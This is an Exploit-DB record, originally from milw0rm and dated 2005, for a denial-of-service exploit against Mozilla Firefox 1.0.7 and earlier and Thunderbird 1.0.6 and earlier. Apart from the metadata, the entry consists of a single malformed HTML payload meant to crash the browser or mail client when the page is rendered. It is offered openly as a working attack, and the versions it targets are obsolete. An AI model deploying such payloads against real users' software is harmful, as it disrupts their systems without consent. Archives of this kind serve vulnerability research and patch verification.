Mozilla Firefox <= 1.0.7 Thunderbird <= 1.0.6 Denial of Service Exploit

2005-10-16T00:00:00
ID EDB-ID:1253
Type exploitdb
Reporter posidron
Modified 2005-10-16T00:00:00

Description

Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit. Dos exploits for multiple platform

                                        
                                            &lt;!--
posidron@tripbit.net

Vulnerable: Mozilla Firefox &lt;= 1.0.7
            Mozilla Thunderbird  &lt;= 1.0.6

--&gt;

&lt;html&gt;&lt;body&gt;&lt;strong&gt;Mozilla&lt;sourcetext&gt;&lt;/body&gt;&lt;/html&gt;

# milw0rm.com [2005-10-16]